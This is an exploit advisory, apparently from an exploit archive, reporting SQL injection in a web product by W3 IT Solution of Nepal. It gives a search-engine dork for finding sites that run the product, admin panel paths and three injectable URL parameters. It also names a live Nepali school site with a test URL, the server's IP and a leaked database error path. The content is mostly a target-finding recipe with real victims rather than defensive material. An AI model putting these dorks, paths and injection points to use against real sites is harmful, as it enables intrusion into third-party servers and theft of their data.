Power By W3 IT Solution Web Company Nepal SQL Injection

1. ##########################################################
2.  
3. # Exploit Title : Power By W3 IT Solution Web Company Nepal SQL Injection
4. # Author [ Discovered By ] : KingSkrupellos
5. # Team : Cyberizm Digital Security Army
6. # Date : 08/01/2019
7. # Vendor Homepage : w3itsolution.com
8. # Tested On : Windows and Linux
9. # Category : WebApps
10. # Exploit Risk : Medium
11. # Google Dorks : intext:''Power by W3 IT SOLUTION'' site:edu.np
12. # Vulnerability Type : CWE-89 [ Improper Neutralization of
13. Special Elements used in an SQL Command ('SQL Injection') ]
14.  
15. ##########################################################
16.  
17. # Admin Panel Login Path :
18. *************************
19.  
20. /home/admin_tansen_multiple/
21.  
22. /home/admin_[PATH]_multiple/
23.  
24. # SQL Injection Exploit :
25. **********************
26.  
27. /home/news.php?ID=[SQL Injection]
28.  
29. /home/gallery_details.php?catID=[SQL Injection]
30.  
31. /home/conn.php?ID=[SQL Injection]
32.  
33. ##########################################################
34.  
35. # Example Vulnerable Site =>
36. **************************
37.  
38. Note => (72.29.65.177) => There are 540 domains hosted on this server.
39.  
40. [+] tansenmultiple.edu.np/home/news.php?ID=2%27 =>
41.  
42. [Proof of Concept] => archive.fo/aiRil
43.  
44. ##########################################################
45.  
46. # SQL Database Error :
47. ********************
48.  
49. Deprecated: mysql_connect(): The mysql extension is deprecated
50. and will be removed in the future: use mysqli or PDO instead in
51. /home/tansen/public_html/home/conn.php on line 2
52.  
53. ##########################################################
54.  
55. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
56.  
57. ##########################################################